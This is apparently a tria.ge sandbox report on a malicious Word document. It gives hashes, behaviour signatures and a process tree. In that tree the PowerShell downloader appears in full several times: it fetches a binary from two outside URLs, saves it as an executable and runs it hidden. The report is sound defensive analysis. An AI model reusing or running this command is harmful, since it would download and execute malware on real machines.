Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
10/05/2024, 08:26
General
-
Target
2e3875e26c9f346b54c4afa12b04ac29_JaffaCakes118.doc
-
Size
85KB
-
MD5
2e3875e26c9f346b54c4afa12b04ac29
-
SHA1
9efc30c5886061492acc697ae2c6fb568080dc7b
-
SHA256
1786759ce3f8294887c1dd6a2431fe69af2af80d33b022b3f7ca2a7595e2e488
-
SHA512
577c22949f5c785c7d47a193ab61ec4f0a15c0876c440d643b4c226ab9fbe23f164c34939152be66762813b3f13909dbe8e301335c926627b5365554b8ef2d77
-
SSDEEP
768:MTXUAvRB5LcJgwo4r65/KCBuxEYqdUqVt/azV8Vq4rYWAHpP7p6pXpc:KlvRB5QIv3yqCWAHd7g56
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2e3875e26c9f346b54c4afa12b04ac29_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function Gpuhssobjud([String] $tejjvhxfajx){(New-Object System.Net.WebClient).DownloadFile($tejjvhxfajx,''C:\Users\Admin\AppData\Local\Temp\Tw_sphaduz.exe'');Start-Process ''C:\Users\Admin\AppData\Local\Temp\Tw_sphaduz.exe'';}try{Gpuhssobjud(''http://chimachinenow.com/kperotac.bin'')}catch{Gpuhssobjud(''http://basarteks.com/kperotac.bin'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\Admin\AppData\Local\Temp\Hq-akxeaqf.bat;Start-Process 'C:\Users\Admin\AppData\Local\Temp\Hq-akxeaqf.bat' -WindowStyle Hidden"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowerShell "'PowerShell ""function Gpuhssobjud([String] $tejjvhxfajx){(New-Object System.Net.WebClient).DownloadFile($tejjvhxfajx,''C:\Users\Admin\AppData\Local\Temp\Tw_sphaduz.exe'');Start-Process ''C:\Users\Admin\AppData\Local\Temp\Tw_sphaduz.exe'';}try{Gpuhssobjud(''http://chimachinenow.com/kperotac.bin'')}catch{Gpuhssobjud(''http://basarteks.com/kperotac.bin'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\Admin\AppData\Local\Temp\Hq-akxeaqf.bat;Start-Process 'C:\Users\Admin\AppData\Local\Temp\Hq-akxeaqf.bat' -WindowStyle Hidden"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Hq-akxeaqf.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowerShell "function Gpuhssobjud([String] $tejjvhxfajx){(New-Object System.Net.WebClient).DownloadFile($tejjvhxfajx,'C:\Users\Admin\AppData\Local\Temp\Tw_sphaduz.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\Tw_sphaduz.exe';}try{Gpuhssobjud('http://chimachinenow.com/kperotac.bin')}catch{Gpuhssobjud('http://basarteks.com/kperotac.bin')}5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
348B
MD5071a015ccb233e91932064151832e13e
SHA1315ff141b1e042cc06f29de7110c9f72a57e00f6
SHA2562612fbf2940f55d5d9a785f1806cb37274b4d63a25a202267c038e97583baf53
SHA512bd5753c2aad0e822268d0c01b50f963c82bf19f8df453d987baa6323b6a7c9d42576e8b07fecfa9ed9ed5534255d947658a4443b3a478679a9097859f675ba0b
-
Filesize
20KB
MD5f3e8ea5e9a6d0903979a84ab3df1eeb6
SHA143fd45724aff80f87bc9172114212dde55ce63e1
SHA2561221f54041c5f2e3e37bc66ab8bcaf2e5641a1dd0c4718862716ed718fdad3c1
SHA51275ef13db61470987b955d9e4ac6fabde7b0333f8deba89f3b3deb7f3b36888d13d37aa0e97cb0de09665d89ac40d9f9666fb073d4d2a1e2ae879f29547933426
-
Filesize
7KB
MD5264d30c10981be5ec95b98554195a6a5
SHA128b47039c85850c22a17206da9b11674c5087fc2
SHA256d6a83d49c6739930dad5e8b4da22713d822afb5cc40d4fccde03d003de8c6837
SHA512fa806d71bc3aa1744bb7f5910337b34a6dc2eeb99db44d87114ee47364b4f91bf9ce96d40dcc07d185194b6c034cd02a2417662c3bca754ca6ca45af842efb80
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
1024KB
-
Filesize
44KB